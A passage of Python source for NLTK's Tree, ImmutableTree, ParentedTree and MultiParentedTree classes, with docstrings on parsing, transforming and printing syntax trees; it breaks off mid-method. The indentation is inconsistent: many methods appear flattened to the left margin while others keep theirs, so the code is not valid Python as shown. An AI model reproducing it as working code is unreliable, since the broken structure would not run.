Generate all the subtrees of this tree, optionally restricted
to trees matching the filter function.
>>> t = Tree.fromstring("(S (NP (D the) (N dog)) (VP (V chased) (NP (D the) (N cat))))")
>>> for s in t.subtrees(lambda t: t.height() == 2):
... print(s)
(D the)
(N dog)
(V chased)
(D the)
(N cat)
:type filter: function
:param filter: the function to filter all local trees
"""
if not filter or filter(self):
yield self
for child in self:
if isinstance(child, Tree):
for subtree in child.subtrees(filter):
yield subtree
def productions(self):
"""
Generate the productions that correspond to the non-terminal nodes of the tree.
For each subtree of the form (P: C1 C2 ... Cn) this produces a production of the
form P -> C1 C2 ... Cn.
>>> t = Tree.fromstring("(S (NP (D the) (N dog)) (VP (V chased) (NP (D the) (N cat))))")
>>> t.productions()
[S -> NP VP, NP -> D N, D -> 'the', N -> 'dog', VP -> V NP, V -> 'chased',
NP -> D N, D -> 'the', N -> 'cat']
:rtype: list(Production)
"""
if not isinstance(self._label, string_types):
raise TypeError('Productions can only be generated from trees having node labels that are strings')
prods = [Production(Nonterminal(self._label), _child_names(self))]
for child in self:
if isinstance(child, Tree):
prods += child.productions()
return prods
def pos(self):
"""
Return a sequence of pos-tagged words extracted from the tree.
>>> t = Tree.fromstring("(S (NP (D the) (N dog)) (VP (V chased) (NP (D the) (N cat))))")
>>> t.pos()
[('the', 'D'), ('dog', 'N'), ('chased', 'V'), ('the', 'D'), ('cat', 'N')]
:return: a list of tuples containing leaves and pre-terminals (part-of-speech tags).
The order reflects the order of the leaves in the tree's hierarchical structure.
:rtype: list(tuple)
"""
pos = []
for child in self:
if isinstance(child, Tree):
pos.extend(child.pos())
else:
pos.append((child, self._label))
return pos
    def leaf_treeposition(self, index):
        """
        :return: The tree position of the ``index``-th leaf in this
            tree.  I.e., if ``tp=self.leaf_treeposition(i)``, then
            ``self[tp]==self.leaves()[i]``.

        :raise IndexError: If this tree contains fewer than ``index+1``
            leaves, or if ``index<0``.
        """
        if index < 0: raise IndexError('index must be non-negative')
        # Iterative depth-first search.  Children are pushed in reverse so
        # that popping the stack visits them left-to-right, matching the
        # order produced by leaves().
        stack = [(self, ())]
        while stack:
            value, treepos = stack.pop()
            if not isinstance(value, Tree):
                # Found a leaf; count down until the requested one.
                if index == 0: return treepos
                else: index -= 1
            else:
                for i in range(len(value)-1, -1, -1):
                    stack.append( (value[i], treepos+(i,)) )
        raise IndexError('index must be less than or equal to len(self)')
    def treeposition_spanning_leaves(self, start, end):
        """
        :return: The tree position of the lowest descendant of this
            tree that dominates ``self.leaves()[start:end]``.
        :raise ValueError: if ``end <= start``
        """
        if end <= start:
            raise ValueError('end must be greater than start')
        # Find the tree positions of the start & end leaves, and
        # take the longest common subsequence.
        start_treepos = self.leaf_treeposition(start)
        end_treepos = self.leaf_treeposition(end-1)
        # Find the first index where they mismatch; the common prefix is the
        # position of the lowest node dominating both leaves.
        for i in range(len(start_treepos)):
            if i == len(end_treepos) or start_treepos[i] != end_treepos[i]:
                return start_treepos[:i]
        # start's position is a prefix of end's: start's ancestor dominates both.
        return start_treepos
#////////////////////////////////////////////////////////////
# Transforms
#////////////////////////////////////////////////////////////
    def chomsky_normal_form(self, factor="right", horzMarkov=None, vertMarkov=0, childChar="|", parentChar="^"):
        """
        Transform this tree in place.  This method can modify a tree in
        three ways:

          1. Convert a tree into its Chomsky Normal Form (CNF)
             equivalent -- Every subtree has either two non-terminals
             or one terminal as its children.  This process requires
             the creation of more "artificial" non-terminal nodes.
          2. Markov (vertical) smoothing of children in new artificial
             nodes
          3. Horizontal (parent) annotation of nodes

        :param factor: Right or left factoring method (default = "right")
        :type factor: str = [left|right]
        :param horzMarkov: Markov order for sibling smoothing in artificial nodes (None (default) = include all siblings)
        :type horzMarkov: int | None
        :param vertMarkov: Markov order for parent smoothing (0 (default) = no vertical annotation)
        :type vertMarkov: int | None
        :param childChar: A string used in construction of the artificial nodes, separating the head of the
            original subtree from the child nodes that have yet to be expanded (default = "|")
        :type childChar: str
        :param parentChar: A string used to separate the node representation from its vertical annotation
        :type parentChar: str
        """
        # Imported lazily to avoid a circular import with nltk.treetransforms.
        from nltk.treetransforms import chomsky_normal_form
        chomsky_normal_form(self, factor, horzMarkov, vertMarkov, childChar, parentChar)
    def un_chomsky_normal_form(self, expandUnary = True, childChar = "|", parentChar = "^", unaryChar = "+"):
        """
        Transform this tree in place.  This method modifies the tree in
        three ways:

          1. Transforms a tree in Chomsky Normal Form back to its
             original structure (branching greater than two)
          2. Removes any parent annotation (if it exists)
          3. (optional) expands unary subtrees (if previously
             collapsed with collapseUnary(...) )

        :param expandUnary: Flag to expand unary or not (default = True)
        :type expandUnary: bool
        :param childChar: A string separating the head node from its children in an artificial node (default = "|")
        :type childChar: str
        :param parentChar: A string separating the node label from its parent annotation (default = "^")
        :type parentChar: str
        :param unaryChar: A string joining two non-terminals in a unary production (default = "+")
        :type unaryChar: str
        """
        # Imported lazily to avoid a circular import with nltk.treetransforms.
        from nltk.treetransforms import un_chomsky_normal_form
        un_chomsky_normal_form(self, expandUnary, childChar, parentChar, unaryChar)
    def collapse_unary(self, collapsePOS = False, collapseRoot = False, joinChar = "+"):
        """
        Collapse subtrees with a single child (i.e. unary productions)
        into a new non-terminal (Tree node) joined by 'joinChar'.
        This is useful when working with algorithms that do not allow
        unary productions, and completely removing the unary productions
        would require loss of useful information.  The Tree is modified
        directly (since it is passed by reference) and no value is returned.

        :param collapsePOS: 'False' (default) will not collapse the parent of leaf nodes (i.e.
            Part-of-Speech tags) since they are always unary productions
        :type collapsePOS: bool
        :param collapseRoot: 'False' (default) will not modify the root production
            if it is unary.  For the Penn WSJ treebank corpus, this corresponds
            to the TOP -> productions.
        :type collapseRoot: bool
        :param joinChar: A string used to connect collapsed node values (default = "+")
        :type joinChar: str
        """
        # Imported lazily to avoid a circular import with nltk.treetransforms.
        from nltk.treetransforms import collapse_unary
        collapse_unary(self, collapsePOS, collapseRoot, joinChar)
#////////////////////////////////////////////////////////////
# Convert, copy
#////////////////////////////////////////////////////////////
@classmethod
def convert(cls, tree):
"""
Convert a tree between different subtypes of Tree. ``cls`` determines
which class will be used to encode the new tree.
:type tree: Tree
:param tree: The tree that should be converted.
:return: The new Tree.
"""
if isinstance(tree, Tree):
children = [cls.convert(child) for child in tree]
return cls(tree._label, children)
else:
return tree
def copy(self, deep=False):
if not deep: return type(self)(self._label, self)
else: return type(self).convert(self)
def _frozen_class(self): return ImmutableTree
    def freeze(self, leaf_freezer=None):
        """
        Return an immutable (hashable) copy of this tree, of the class
        given by ``self._frozen_class()``.

        :param leaf_freezer: optional function applied to every leaf to
            make it hashable (e.g. converting mutable leaf values into
            tuples) before the tree is converted to its frozen class.
        """
        frozen_class = self._frozen_class()
        if leaf_freezer is None:
            newcopy = frozen_class.convert(self)
        else:
            # Deep-copy first so freezing the leaves never mutates self.
            newcopy = self.copy(deep=True)
            for pos in newcopy.treepositions('leaves'):
                newcopy[pos] = leaf_freezer(newcopy[pos])
            newcopy = frozen_class.convert(newcopy)
        hash(newcopy) # Make sure the leaves are hashable.
        return newcopy
#////////////////////////////////////////////////////////////
# Parsing
#////////////////////////////////////////////////////////////
@classmethod
def fromstring(cls, s, brackets='()', read_node=None, read_leaf=None,
               node_pattern=None, leaf_pattern=None,
               remove_empty_top_bracketing=False):
    """
    Read a bracketed tree string and return the resulting tree.
    Trees are represented as nested brackettings, such as::

        (S (NP (NNP John)) (VP (V runs)))

    :type s: str
    :param s: The string to read

    :type brackets: str (length=2)
    :param brackets: The bracket characters used to mark the
        beginning and end of trees and subtrees.

    :type read_node: function
    :type read_leaf: function
    :param read_node, read_leaf: If specified, these functions
        are applied to the substrings of ``s`` corresponding to
        nodes and leaves (respectively) to obtain the values for
        those nodes and leaves.  They should have the following
        signature:

            read_node(str) -> value

        For example, these functions could be used to process nodes
        and leaves whose values should be some type other than
        string (such as ``FeatStruct``).
        Note that by default, node strings and leaf strings are
        delimited by whitespace and brackets; to override this
        default, use the ``node_pattern`` and ``leaf_pattern``
        arguments.

    :type node_pattern: str
    :type leaf_pattern: str
    :param node_pattern, leaf_pattern: Regular expression patterns
        used to find node and leaf substrings in ``s``.  By
        default, both nodes patterns are defined to match any
        sequence of non-whitespace non-bracket characters.

    :type remove_empty_top_bracketing: bool
    :param remove_empty_top_bracketing: If the resulting tree has
        an empty node label, and is length one, then return its
        single child instead.  This is useful for treebank trees,
        which sometimes contain an extra level of bracketing.

    :return: A tree corresponding to the string representation ``s``.
        If this class method is called using a subclass of Tree,
        then it will return a tree of that type.
    :rtype: Tree
    """
    if not isinstance(brackets, string_types) or len(brackets) != 2:
        raise TypeError('brackets must be a length-2 string')
    # NOTE: raw strings are used for all regex literals below; the
    # original non-raw '\s' forms relied on Python preserving invalid
    # escapes and warn on modern interpreters.  The pattern values are
    # unchanged.
    if re.search(r'\s', brackets):
        raise TypeError('whitespace brackets not allowed')
    # Construct a regexp that will tokenize the string.
    open_b, close_b = brackets
    open_pattern, close_pattern = (re.escape(open_b), re.escape(close_b))
    if node_pattern is None:
        node_pattern = r'[^\s%s%s]+' % (open_pattern, close_pattern)
    if leaf_pattern is None:
        leaf_pattern = r'[^\s%s%s]+' % (open_pattern, close_pattern)
    token_re = re.compile(r'%s\s*(%s)?|%s|(%s)' % (
        open_pattern, node_pattern, close_pattern, leaf_pattern))
    # Walk through each token, updating a stack of trees.
    stack = [(None, [])] # list of (node, children) tuples
    for match in token_re.finditer(s):
        token = match.group()
        # Beginning of a tree/subtree
        if token[0] == open_b:
            if len(stack) == 1 and len(stack[0][1]) > 0:
                cls._parse_error(s, match, 'end-of-string')
            label = token[1:].lstrip()
            if read_node is not None: label = read_node(label)
            stack.append((label, []))
        # End of a tree/subtree
        elif token == close_b:
            if len(stack) == 1:
                if len(stack[0][1]) == 0:
                    cls._parse_error(s, match, open_b)
                else:
                    cls._parse_error(s, match, 'end-of-string')
            label, children = stack.pop()
            stack[-1][1].append(cls(label, children))
        # Leaf node
        else:
            if len(stack) == 1:
                cls._parse_error(s, match, open_b)
            if read_leaf is not None: token = read_leaf(token)
            stack[-1][1].append(token)
    # check that we got exactly one complete tree.
    if len(stack) > 1:
        cls._parse_error(s, 'end-of-string', close_b)
    elif len(stack[0][1]) == 0:
        cls._parse_error(s, 'end-of-string', open_b)
    else:
        assert stack[0][0] is None
        assert len(stack[0][1]) == 1
        tree = stack[0][1][0]
    # If the tree has an extra level with node='', then get rid of
    # it.  E.g.: "((S (NP ...) (VP ...)))"
    if remove_empty_top_bracketing and tree._label == '' and len(tree) == 1:
        tree = tree[0]
    # return the tree.
    return tree
@classmethod
def _parse_error(cls, s, match, expecting):
    """
    Display a friendly error message when parsing a tree string fails.

    :param s: The string we're parsing.
    :param match: regexp match of the problem token, or the string
        ``'end-of-string'`` when the input ended unexpectedly.
    :param expecting: what we expected to see instead.
    :raise ValueError: always; the message pinpoints the bad token.
    """
    # Locate the offending token.
    if match == 'end-of-string':
        pos = len(s)
        token = 'end-of-string'
    else:
        pos = match.start()
        token = match.group()
    header = '%s.read(): expected %r but got %r\n%sat index %d.' % (
        cls.__name__, expecting, token, ' ' * 12, pos)
    # Add a display showing the error token itself, trimmed to a short
    # excerpt around the error position with a caret underneath.
    excerpt = s.replace('\n', ' ').replace('\t', ' ')
    caret_offset = pos
    if len(excerpt) > pos + 10:
        excerpt = excerpt[:pos + 10] + '...'
    if pos > 10:
        excerpt = '...' + excerpt[pos - 10:]
        caret_offset = 13
    raise ValueError(header + '\n%s"%s"\n%s^' % (
        ' ' * 16, excerpt, ' ' * (17 + caret_offset)))
#////////////////////////////////////////////////////////////
# Visualization & String Representation
#////////////////////////////////////////////////////////////
def draw(self):
    """
    Open a new window containing a graphical diagram of this tree.
    """
    # Imported lazily so merely importing this module does not pull in
    # the drawing (GUI) machinery.
    from nltk.draw.tree import draw_trees
    draw_trees(self)
def pretty_print(self, sentence=None, highlight=(), stream=None, **kwargs):
    """
    Pretty-print this tree as ASCII or Unicode art.
    For explanation of the arguments, see the documentation for
    `nltk.treeprettyprinter.TreePrettyPrinter`.
    """
    from nltk.treeprettyprinter import TreePrettyPrinter
    printer = TreePrettyPrinter(self, sentence, highlight)
    print(printer.text(**kwargs), file=stream)
def __repr__(self):
    """Return an eval-able ``ClassName(label, [children...])`` string."""
    label_repr = unicode_repr(self._label)
    child_reprs = [unicode_repr(child) for child in self]
    return '%s(%s, [%s])' % (type(self).__name__, label_repr,
                             ", ".join(child_reprs))
def _repr_png_(self):
    """
    Draws and outputs in PNG for ipython.
    PNG is used instead of PDF, since it can be displayed in the qt console and
    has wider browser support.
    """
    import os
    import base64
    import subprocess
    import tempfile
    from nltk.draw.tree import tree_to_treesegment
    from nltk.draw.util import CanvasFrame
    from nltk.internals import find_binary
    # Render the tree onto an (offscreen) canvas widget.
    _canvas_frame = CanvasFrame()
    widget = tree_to_treesegment(_canvas_frame.canvas(), self)
    _canvas_frame.add_widget(widget)
    x, y, w, h = widget.bbox()
    # print_to_file uses scrollregion to set the width and height of the pdf.
    _canvas_frame.canvas()['scrollregion'] = (0, 0, w, h)
    with tempfile.NamedTemporaryFile() as file:
        in_path = '{0:}.ps'.format(file.name)
        out_path = '{0:}.png'.format(file.name)
        _canvas_frame.print_to_file(in_path)
        _canvas_frame.destroy_widget(widget)
        # Convert the PostScript dump to PNG with Ghostscript ('gs';
        # gswin32c.exe/gswin64c.exe on Windows).
        subprocess.call([find_binary('gs', binary_names=['gswin32c.exe', 'gswin64c.exe'], env_vars=['PATH'], verbose=False)] +
                        '-q -dEPSCrop -sDEVICE=png16m -r90 -dTextAlphaBits=4 -dGraphicsAlphaBits=4 -dSAFER -dBATCH -dNOPAUSE -sOutputFile={0:} {1:}'
                        .format(out_path, in_path).split())
        with open(out_path, 'rb') as sr:
            res = sr.read()
        # Clean up the two temporary files we created alongside 'file'.
        os.remove(in_path)
        os.remove(out_path)
        return base64.b64encode(res).decode()
def __str__(self):
    """Return a pretty-printed rendering of this tree (see ``pformat``)."""
    return self.pformat()
def pprint(self, **kwargs):
    """
    Print a string representation of this Tree to 'stream'
    """
    # Split the optional 'stream' argument off before delegating the
    # remaining keyword arguments to pformat().
    stream = kwargs.pop("stream", None)
    print(self.pformat(**kwargs), file=stream)
def pformat(self, margin=70, indent=0, nodesep='', parens='()', quotes=False):
    """
    :return: A pretty-printed string representation of this tree.
    :rtype: str
    :param margin: The right margin at which to do line-wrapping.
    :type margin: int
    :param indent: The indentation level at which printing
        begins.  This number is used to decide how far to indent
        subsequent lines.
    :type indent: int
    :param nodesep: A string that is used to separate the node
        from the children.  E.g., the value ``':'`` gives
        trees like ``(S: (NP: I) (VP: (V: saw) (NP: it)))``.
    :param parens: A length-2 string giving the open and close bracket
        characters (default ``'()'``).
    :param quotes: If true, string leaves are rendered with their repr;
        if false (default), they are emitted bare.
    """
    # Try writing it on one line.
    s = self._pformat_flat(nodesep, parens, quotes)
    if len(s) + indent < margin:
        return s
    # If it doesn't fit on one line, then write it on multi-lines.
    if isinstance(self._label, string_types):
        s = '%s%s%s' % (parens[0], self._label, nodesep)
    else:
        s = '%s%s%s' % (parens[0], unicode_repr(self._label), nodesep)
    for child in self:
        if isinstance(child, Tree):
            s += '\n'+' '*(indent+2)+child.pformat(margin, indent+2,
                                                   nodesep, parens, quotes)
        elif isinstance(child, tuple):
            # Tuple leaves (e.g. word/tag pairs) are slash-joined.
            s += '\n'+' '*(indent+2)+ "/".join(child)
        elif isinstance(child, string_types) and not quotes:
            s += '\n'+' '*(indent+2)+ '%s' % child
        else:
            s += '\n'+' '*(indent+2)+ unicode_repr(child)
    return s+parens[1]
def pformat_latex_qtree(self):
    r"""
    Returns a representation of the tree compatible with the
    LaTeX qtree package. This consists of the string ``\Tree``
    followed by the tree represented in bracketed notation.

    For example, the following result was generated from a parse tree of
    the sentence ``The announcement astounded us``::

      \Tree [.I'' [.N'' [.D The ] [.N' [.N announcement ] ] ]
          [.I' [.V'' [.V' [.V astounded ] [.N'' [.N' [.N us ] ] ] ] ] ] ]

    See http://www.ling.upenn.edu/advice/latex.html for the LaTeX
    style file for the qtree package.

    :return: A latex qtree representation of this tree.
    :rtype: str
    """
    # Raw string for the regex literal: the original non-raw form
    # contained invalid escape sequences (\$ \{ \}) which warn on
    # modern Python; the pattern value is unchanged.  Characters that
    # are special to LaTeX get a backslash prefix.
    reserved_chars = re.compile(r'([#\$%&~_\{\}])')
    pformat = self.pformat(indent=6, nodesep='', parens=('[.', ' ]'))
    return r'\Tree ' + re.sub(reserved_chars, r'\\\1', pformat)
def _pformat_flat(self, nodesep, parens, quotes):
    """Return a single-line bracketed rendering of this tree."""
    def render(child):
        # Subtrees recurse; tuple leaves are slash-joined; string
        # leaves are emitted bare unless ``quotes`` is set.
        if isinstance(child, Tree):
            return child._pformat_flat(nodesep, parens, quotes)
        if isinstance(child, tuple):
            return "/".join(child)
        if isinstance(child, string_types) and not quotes:
            return '%s' % child
        return unicode_repr(child)

    if isinstance(self._label, string_types):
        label = self._label
    else:
        label = unicode_repr(self._label)
    return '%s%s%s %s%s' % (parens[0], label, nodesep,
                            " ".join(render(child) for child in self),
                            parens[1])
class ImmutableTree(Tree):
    """
    An immutable (and therefore hashable) version of ``Tree``.

    Every mutating operation raises ``ValueError``.  The hash value is
    computed once at construction time, which also verifies that the
    label and children are themselves immutable.
    """
    def __init__(self, node, children=None):
        super(ImmutableTree, self).__init__(node, children)
        # Precompute our hash value.  This ensures that we're really
        # immutable, and it means we only have to calculate it once.
        try:
            self._hash = hash((self._label, tuple(self)))
        except (TypeError, ValueError):
            raise ValueError("%s: node value and children "
                             "must be immutable" % type(self).__name__)

    def _blocked(self):
        # All mutators funnel through here so the error text lives in
        # exactly one place.
        raise ValueError('%s may not be modified' % type(self).__name__)

    def __setitem__(self, index, value):
        self._blocked()

    def __setslice__(self, i, j, value):
        self._blocked()

    def __delitem__(self, index):
        self._blocked()

    def __delslice__(self, i, j):
        self._blocked()

    def __iadd__(self, other):
        self._blocked()

    def __imul__(self, other):
        self._blocked()

    def append(self, v):
        self._blocked()

    def extend(self, v):
        self._blocked()

    def pop(self, v=None):
        self._blocked()

    def remove(self, v):
        self._blocked()

    def reverse(self):
        self._blocked()

    def sort(self):
        self._blocked()

    def __hash__(self):
        return self._hash

    def set_label(self, value):
        """
        Set the node label.  This will only succeed the first time the
        node label is set, which should occur in ImmutableTree.__init__().
        """
        if hasattr(self, '_label'):
            self._blocked()
        self._label = value
class AbstractParentedTree(Tree):
    """
    An abstract base class for a ``Tree`` that automatically maintains
    pointers to parent nodes.  These parent pointers are updated
    whenever any change is made to a tree's structure.  Two subclasses
    are currently defined:

      - ``ParentedTree`` is used for tree structures where each subtree
        has at most one parent.  This class should be used in cases
        where there is no "sharing" of subtrees.

      - ``MultiParentedTree`` is used for tree structures where a
        subtree may have zero or more parents.  This class should be
        used in cases where subtrees may be shared.

    Subclassing
    ===========
    The ``AbstractParentedTree`` class redefines all operations that
    modify a tree's structure to call two methods, which are used by
    subclasses to update parent information:

      - ``_setparent()`` is called whenever a new child is added.
      - ``_delparent()`` is called whenever a child is removed.
    """
    def __init__(self, node, children=None):
        super(AbstractParentedTree, self).__init__(node, children)
        # If children is None, the tree is read from node, and
        # all parents will be set during parsing.
        if children is not None:
            # Otherwise we have to set the parent of the children.
            # Iterate over self, and *not* children, because children
            # might be an iterator.  The first pass is a dry run, so no
            # parent pointer is touched if any child would be rejected.
            for i, child in enumerate(self):
                if isinstance(child, Tree):
                    self._setparent(child, i, dry_run=True)
            for i, child in enumerate(self):
                if isinstance(child, Tree):
                    self._setparent(child, i)

    #////////////////////////////////////////////////////////////
    # Parent management
    #////////////////////////////////////////////////////////////
    def _setparent(self, child, index, dry_run=False):
        """
        Update the parent pointer of ``child`` to point to ``self``.  This
        method is only called if the type of ``child`` is ``Tree``;
        i.e., it is not called when adding a leaf to a tree.  This method
        is always called before the child is actually added to the
        child list of ``self``.

        :type child: Tree
        :type index: int
        :param index: The index of ``child`` in ``self``.
        :raise TypeError: If ``child`` is a tree with an inappropriate
            type.  Typically, if ``child`` is a tree, then its type needs
            to match the type of ``self``.  This prevents mixing of
            different tree types (single-parented, multi-parented, and
            non-parented).
        :param dry_run: If true, don't actually set the child's
            parent pointer; just check for any error conditions, and
            raise an exception if one is found.
        """
        raise NotImplementedError()

    def _delparent(self, child, index):
        """
        Update the parent pointer of ``child`` to not point to self.  This
        method is only called if the type of ``child`` is ``Tree``; i.e., it
        is not called when removing a leaf from a tree.  This method
        is always called before the child is actually removed from the
        child list of ``self``.

        :type child: Tree
        :type index: int
        :param index: The index of ``child`` in ``self``.
        """
        raise NotImplementedError()

    #////////////////////////////////////////////////////////////
    # Methods that add/remove children
    #////////////////////////////////////////////////////////////
    # Every method that adds or removes a child must make
    # appropriate calls to _setparent() and _delparent().

    def __delitem__(self, index):
        # del ptree[start:stop]
        if isinstance(index, slice):
            start, stop, step = slice_bounds(self, index, allow_step=True)
            # Clear all the children pointers.
            for i in range(start, stop, step):
                if isinstance(self[i], Tree):
                    self._delparent(self[i], i)
            # Delete the children from our child list.
            super(AbstractParentedTree, self).__delitem__(index)

        # del ptree[i]
        elif isinstance(index, int):
            if index < 0: index += len(self)
            if index < 0: raise IndexError('index out of range')
            # Clear the child's parent pointer.
            if isinstance(self[index], Tree):
                self._delparent(self[index], index)
            # Remove the child from our child list.
            super(AbstractParentedTree, self).__delitem__(index)

        elif isinstance(index, (list, tuple)):
            # del ptree[()]
            if len(index) == 0:
                raise IndexError('The tree position () may not be deleted.')
            # del ptree[(i,)]
            elif len(index) == 1:
                del self[index[0]]
            # del ptree[i1, i2, i3]
            else:
                del self[index[0]][index[1:]]

        else:
            raise TypeError("%s indices must be integers, not %s" %
                            (type(self).__name__, type(index).__name__))

    def __setitem__(self, index, value):
        # ptree[start:stop] = value
        if isinstance(index, slice):
            start, stop, step = slice_bounds(self, index, allow_step=True)
            # make a copy of value, in case it's an iterator
            if not isinstance(value, (list, tuple)):
                value = list(value)
            # Check for any error conditions, so we can avoid ending
            # up in an inconsistent state if an error does occur.
            for i, child in enumerate(value):
                if isinstance(child, Tree):
                    self._setparent(child, start + i*step, dry_run=True)
            # clear the child pointers of all parents we're removing
            for i in range(start, stop, step):
                if isinstance(self[i], Tree):
                    self._delparent(self[i], i)
            # set the child pointers of the new children.  We do this
            # after clearing *all* child pointers, in case we're e.g.
            # reversing the elements in a tree.
            for i, child in enumerate(value):
                if isinstance(child, Tree):
                    self._setparent(child, start + i*step)
            # finally, update the content of the child list itself.
            super(AbstractParentedTree, self).__setitem__(index, value)

        # ptree[i] = value
        elif isinstance(index, int):
            if index < 0: index += len(self)
            if index < 0: raise IndexError('index out of range')
            # if the value is not changing, do nothing.
            if value is self[index]:
                return
            # Set the new child's parent pointer.
            if isinstance(value, Tree):
                self._setparent(value, index)
            # Remove the old child's parent pointer
            if isinstance(self[index], Tree):
                self._delparent(self[index], index)
            # Update our child list.
            super(AbstractParentedTree, self).__setitem__(index, value)

        elif isinstance(index, (list, tuple)):
            # ptree[()] = value
            if len(index) == 0:
                raise IndexError('The tree position () may not be assigned to.')
            # ptree[(i,)] = value
            elif len(index) == 1:
                self[index[0]] = value
            # ptree[i1, i2, i3] = value
            else:
                self[index[0]][index[1:]] = value

        else:
            raise TypeError("%s indices must be integers, not %s" %
                            (type(self).__name__, type(index).__name__))

    def append(self, child):
        if isinstance(child, Tree):
            self._setparent(child, len(self))
        super(AbstractParentedTree, self).append(child)

    def extend(self, children):
        for child in children:
            if isinstance(child, Tree):
                self._setparent(child, len(self))
            super(AbstractParentedTree, self).append(child)

    def insert(self, index, child):
        # Handle negative indexes.  Note that if index < -len(self),
        # we do *not* raise an IndexError, unlike __getitem__.  This
        # is done for consistency with list.__getitem__ and list.index.
        if index < 0: index += len(self)
        if index < 0: index = 0
        # Set the child's parent, and update our child list.
        if isinstance(child, Tree):
            self._setparent(child, index)
        super(AbstractParentedTree, self).insert(index, child)

    def pop(self, index=-1):
        if index < 0: index += len(self)
        if index < 0: raise IndexError('index out of range')
        if isinstance(self[index], Tree):
            self._delparent(self[index], index)
        return super(AbstractParentedTree, self).pop(index)

    # n.b.: like `list`, this is done by equality, not identity!
    # To remove a specific child, use del ptree[i].
    def remove(self, child):
        index = self.index(child)
        if isinstance(self[index], Tree):
            self._delparent(self[index], index)
        super(AbstractParentedTree, self).remove(child)

    # We need to implement __getslice__ and friends, even though
    # they're deprecated, because otherwise list.__getslice__ will get
    # called (since we're subclassing from list).  Just delegate to
    # __getitem__ etc., but use max(0, start) and max(0, stop) because
    # because negative indices are already handled *before*
    # __getslice__ is called; and we don't want to double-count them.
    if hasattr(list, '__getslice__'):
        def __getslice__(self, start, stop):
            return self.__getitem__(slice(max(0, start), max(0, stop)))
        def __delslice__(self, start, stop):
            return self.__delitem__(slice(max(0, start), max(0, stop)))
        def __setslice__(self, start, stop, value):
            return self.__setitem__(slice(max(0, start), max(0, stop)), value)
class ParentedTree(AbstractParentedTree):
    """
    A ``Tree`` that automatically maintains parent pointers for
    single-parented trees.  The following are methods for querying
    the structure of a parented tree: ``parent``, ``parent_index``,
    ``left_sibling``, ``right_sibling``, ``root``, ``treeposition``.

    Each ``ParentedTree`` may have at most one parent.  In
    particular, subtrees may not be shared.  Any attempt to reuse a
    single ``ParentedTree`` as a child of more than one parent (or
    as multiple children of the same parent) will cause a
    ``ValueError`` exception to be raised.

    ``ParentedTrees`` should never be used in the same tree as ``Trees``
    or ``MultiParentedTrees``.  Mixing tree implementations may result
    in incorrect parent pointers and in ``TypeError`` exceptions.
    """
    def __init__(self, node, children=None):
        # The parent of this Tree, or None if it has no parent.
        self._parent = None
        super(ParentedTree, self).__init__(node, children)
        if children is None:
            # If children is None, the tree is read from node.
            # After parsing, the parent of the immediate children
            # will point to an intermediate tree, not self.
            # We fix this by brute force:
            for i, child in enumerate(self):
                if isinstance(child, Tree):
                    child._parent = None
                    self._setparent(child, i)

    def _frozen_class(self): return ImmutableParentedTree

    #/////////////////////////////////////////////////////////////////
    # Methods
    #/////////////////////////////////////////////////////////////////

    def parent(self):
        """The parent of this tree, or None if it has no parent."""
        return self._parent

    def parent_index(self):
        """
        The index of this tree in its parent.  I.e.,
        ``ptree.parent()[ptree.parent_index()] is ptree``.  Note that
        ``ptree.parent_index()`` is not necessarily equal to
        ``ptree.parent.index(ptree)``, since the ``index()`` method
        returns the first child that is equal to its argument.
        """
        if self._parent is None: return None
        # Search by identity, not equality.
        for i, child in enumerate(self._parent):
            if child is self: return i
        assert False, 'expected to find self in self._parent!'

    def left_sibling(self):
        """The left sibling of this tree, or None if it has none."""
        parent_index = self.parent_index()
        if self._parent and parent_index > 0:
            return self._parent[parent_index-1]
        return None # no left sibling

    def right_sibling(self):
        """The right sibling of this tree, or None if it has none."""
        parent_index = self.parent_index()
        if self._parent and parent_index < (len(self._parent)-1):
            return self._parent[parent_index+1]
        return None # no right sibling

    def root(self):
        """
        The root of this tree.  I.e., the unique ancestor of this tree
        whose parent is None.  If ``ptree.parent()`` is None, then
        ``ptree`` is its own root.
        """
        root = self
        while root.parent() is not None:
            root = root.parent()
        return root

    def treeposition(self):
        """
        The tree position of this tree, relative to the root of the
        tree.  I.e., ``ptree.root[ptree.treeposition] is ptree``.
        """
        if self.parent() is None:
            return ()
        else:
            return self.parent().treeposition() + (self.parent_index(),)

    #/////////////////////////////////////////////////////////////////
    # Parent Management
    #/////////////////////////////////////////////////////////////////
    def _delparent(self, child, index):
        # Sanity checks
        assert isinstance(child, ParentedTree)
        assert self[index] is child
        assert child._parent is self
        # Delete child's parent pointer.
        child._parent = None

    def _setparent(self, child, index, dry_run=False):
        # If the child's type is incorrect, then complain.
        if not isinstance(child, ParentedTree):
            raise TypeError('Can not insert a non-ParentedTree '+
                            'into a ParentedTree')
        # If child already has a parent, then complain.
        if child._parent is not None:
            raise ValueError('Can not insert a subtree that already '
                             'has a parent.')
        # Set child's parent pointer & index.
        if not dry_run:
            child._parent = self
class MultiParentedTree(AbstractParentedTree):
    """
    A ``Tree`` that automatically maintains parent pointers for
    multi-parented trees.  The following are methods for querying the
    structure of a multi-parented tree: ``parents()``, ``parent_indices()``,
    ``left_siblings()``, ``right_siblings()``, ``roots``, ``treepositions``.

    Each ``MultiParentedTree`` may have zero or more parents.  In
    particular, subtrees may be shared.  If a single
    ``MultiParentedTree`` is used as multiple children of the same
    parent, then that parent will appear multiple times in its
    ``parents()`` method.

    ``MultiParentedTrees`` should never be used in the same tree as
    ``Trees`` or ``ParentedTrees``.  Mixing tree implementations may
    result in incorrect parent pointers and in ``TypeError`` exceptions.
    """
    def __init__(self, node, children=None):
        # A list of this tree's parents.  This list should not
        # contain duplicates, even if a parent contains this tree
        # multiple times.
        self._parents = []
        super(MultiParentedTree, self).__init__(node, children)
        if children is None:
            # If children is None, the tree is read from node.
            # After parsing, the parent(s) of the immediate children
            # will point to an intermediate tree, not self.
            # We fix this by brute force:
            for i, child in enumerate(self):
                if isinstance(child, Tree):
                    child._parents = []
                    self._setparent(child, i)

    def _frozen_class(self): return ImmutableMultiParentedTree

    #/////////////////////////////////////////////////////////////////
    # Methods
    #/////////////////////////////////////////////////////////////////

    def parents(self):
        """
        The set of parents of this tree.  If this tree has no parents,
        then ``parents`` is the empty set.  To check if a tree is used
        as multiple children of the same parent, use the
        ``parent_indices()`` method.

        :type: list(MultiParentedTree)
        """
        # Return a copy so callers cannot mutate our bookkeeping list.
        return list(self._parents)

    def left_siblings(self):
        """
        A list of all left siblings of this tree, in any of its parent
        trees.  A tree may be its own left sibling if it is used as
        multiple contiguous children of the same parent.  A tree may
        appear multiple times in this list if it is the left sibling
        of this tree with respect to multiple parents.

        :type: list(MultiParentedTree)
        """
        return [parent[index-1]
